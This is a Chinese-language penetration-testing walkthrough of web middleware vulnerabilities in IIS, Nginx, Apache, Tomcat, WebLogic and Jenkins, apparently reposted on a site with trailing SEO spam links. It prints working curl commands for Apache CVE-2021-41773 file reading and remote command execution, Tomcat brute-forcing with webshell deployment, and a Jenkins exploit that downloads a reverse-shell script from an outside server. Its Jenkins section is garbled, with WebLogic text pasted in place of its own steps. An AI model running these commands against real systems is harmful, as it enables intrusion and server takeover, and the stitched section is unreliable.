当前位置: 首页 > news >正文

网站建设个人工作室网络营销的优势是什么

网站建设个人工作室,网络营销的优势是什么,网站留言短信提醒,网页设计培训英文缩写IIS IIS短文件漏洞 此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。 利用工具 https…

IIS

IIS短文件漏洞

此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。

利用工具

https://github.com/irsdl/IIS-ShortName-Scanner

https://github.com/lijiejie/IIS_shortname_Scanner

IIS文件解析漏洞

IIS 6 解析漏洞

  1. 该版本默认会将*.asp;.jpg 此种格式的文件名,当成Asp解析

  2. 该版本默认会将*.asp/目录下的所有文件当成Asp解析

    如:logo.asp;.jpg xx.asp/logo.jpg

IIS 7.x 解析漏洞

  1. 在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件
  2. 应用场景:配合文件上传获取Webshell

Nginx

DNS解析漏洞(cve-2021-23017)

受影响版本:0.6.18-1.20.0

**poc地址:**https://github.com/M507/CVE-2021-23017-PoC

在这里插入图片描述

复现失败

文件名逻辑漏洞(cve-2013-4547)

受影响版本:0.8.41 ~ 1.4.3 /1.5.0 ~ 1.5.7

\0也就是c语言的结束符的意思,之后我们的通过我们的\0将这个文件名截断成我们的fastcgi认为他到1.gif就结束了,之后对上传的文件进行检查,发现他没有以php结尾,就将这个文件上传上去,然后我们的php-fpm.conf的安全后缀策略(security.limit_extensions = )是空的,之后他就会执行我们上传的1.gif \0.php文件。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

测试
在这里插入图片描述

在这里插入图片描述

测试

在这里插入图片描述

成功

解析漏洞(配置不当)

我们在配置php.ini的时候,开启了我们的自动修复路径(cgi.fix_pathinfo=1),也就是我们访问http://127.0.0.1/test.jpg/test.php,由于没有test.php这个文件我们服务器会自动到上一个路径,发现有test.jpg于是就自己执行了这个文件,但是由于我们在配置php-fpm.conf的安全后缀策略(security.limit_extensions = jpg php )为空或者就只有jpg和php,我们的服务就会执行jpg和php,我们的test.jpg里面就是我们的恶意的php代码,之后通过解析为php文件就导致了我们执行该文件,从而产生了我们的漏洞。

假如下图是上传了包含<?phpinfo();?>的图片

在这里插入图片描述

在后面添加/.php后缀,就会被解析为php

在这里插入图片描述

Apache

目录穿越&命令执行(cve-2021-41773)

版本影响:2.4.49、2.4.50

可见靶场的apache版本满足漏洞版本

在这里插入图片描述

目录穿越

curl -v --path-as-is http://ip:port/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在这里插入图片描述

在这里插入图片描述

RCE

curl --data “echo;id” http://ip:port/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

在这里插入图片描述

在这里插入图片描述

文件解析(cve-2017-15715)

版本影响:2.4.0-2.4.29

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

上传成功

Tomcat

弱口令getshell

影响版本:全版本

弱口令部署war包getshell

在这里插入图片描述

点击【manager app】弹出后台登录框

在这里插入图片描述

抓包爆破

在这里插入图片描述

标记加密的位置

在这里插入图片描述

选择自定义迭代器

在这里插入图片描述

位置一填用户名

在这里插入图片描述

位置二填:

在这里插入图片描述

位置三填密码

在这里插入图片描述

payload处理选择base64加密

在这里插入图片描述

爆破成功

在这里插入图片描述

用户名:tomcat 密码:qwe123

在这里插入图片描述

登录成功

在这里插入图片描述

生成jsp一句话木马

在这里插入图片描述

将jsp木马zip压缩后更改后缀为war 生成war包

在这里插入图片描述

部署war包

在这里插入图片描述

链接成功

在这里插入图片描述

文件上传(cve-2017-12615)

影响版本:7.0.0-7.0.81

使用PUT方法请求 将木马放入数据内,即可上传

三种构造url方式:

PUT /x.jsp/

PUT /x.jsp%20

PUT /x.jsp::$DATA

前两种针对linux 第三种针对windows

在这里插入图片描述

返回201即是上传成功

文件包含(cve-2020-1938)

影响版本:6.* 、7.*<7.0.100、8.*<8.5.51、9.*<9.0.31

工具:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

读取WEB-INF/web.xml文件

在这里插入图片描述

Weblogic

默认端口:7001

weblogic由于有很多漏洞,所以直接梭哈

工具地址:https://github.com/KimJun1010/WeblogicTool

在这里插入图片描述

Jenkins

默认端口:8080

Jenkins-CI远程代码执行(cve-2017-1000353)

影响版本:Jenkins <= 2.56 Jenkins LTS <= 2.46.1

默认端口:7001

weblogic由于有很多漏洞,所以直接梭哈

工具地址:https://github.com/KimJun1010/WeblogicTool

[外链图片转存中...(img-2Q7bVCLi-1731337062708)]
再使用python的exp执行
在这里插入图片描述
shell反弹成功
在这里插入图片描述

远程命令执行(cve-2018-1000861)

影响版本:Jenkins <= 2.153 Jenkins LTS <= 2.138.3

工具下载:https://github.com/orangetw/awesome-jenkins-rce-2019

先将反弹shell的命令放在自己公网服务器上

在这里插入图片描述

python2 exp.py http://123.58.224.8:31731 “curl -o /tmp/1.sh http://117.72.120.22/qdy.txt”
在这里插入图片描述

可以看见qdy.txt文件被目标服务器请求了
在这里插入图片描述

执行反弹shell命令
在这里插入图片描述

在这里插入图片描述

成功接收shell

http://www.15wanjia.com/news/44763.html

相关文章:

  • 记事本做网站怎么不行啦免费的网络推广渠道
  • 机械设计师接私活的网站站长seo综合查询
  • 可以查企业信息的软件seo如何去做优化
  • 自己做返利网站是真的吗域名seo查询
  • 做网站花多钱国内永久免费的云服务器
  • 宿州专业网站建设百度怎么投广告
  • 深圳做网站的公司排行免费的推广网站
  • 成都市建设委员会网站网址导航浏览器下载
  • 影院网站模板岳阳网站设计
  • 信阳建设企业网站公司免费网站安全软件下载
  • 网站模板上传工具兰州网络优化seo
  • 虚拟网站多少钱网页制作的软件有哪些
  • 湖北企业网站建设多少钱aso优化重要吗
  • 沈阳中小企业网站制作宁波seo外包推广软件
  • 网站做代理服务器沈阳关键词seo
  • 建设云南省癌症中心网站深圳网络营销策划公司
  • 网站新闻对百度优化有用吗上海seo网站优化软件
  • 网站防止攻击汽车营销活动策划方案
  • 做界面网站用什么语言引流软件有哪些
  • 网站开发的背景意义关键词优化分析工具
  • 建站平台免代码品牌推广方案怎么写
  • 天津市建设 银行网站江门网站优化公司
  • 淘宝联盟网上的网站建设昆山网站制作哪家好
  • 女生做网站编辑好吗北京全网推广
  • 公司网站日常维护软文公司代写
  • wordpress添加登陆优化搜索引擎营销
  • 用vs做网站的教程公司培训
  • 国内做香港视频网站西安网站建设推广优化
  • 主流网站开发语言有哪些免费推广app软件下载
  • 建设银行住房贷款网站全球最大的磁力搜索引擎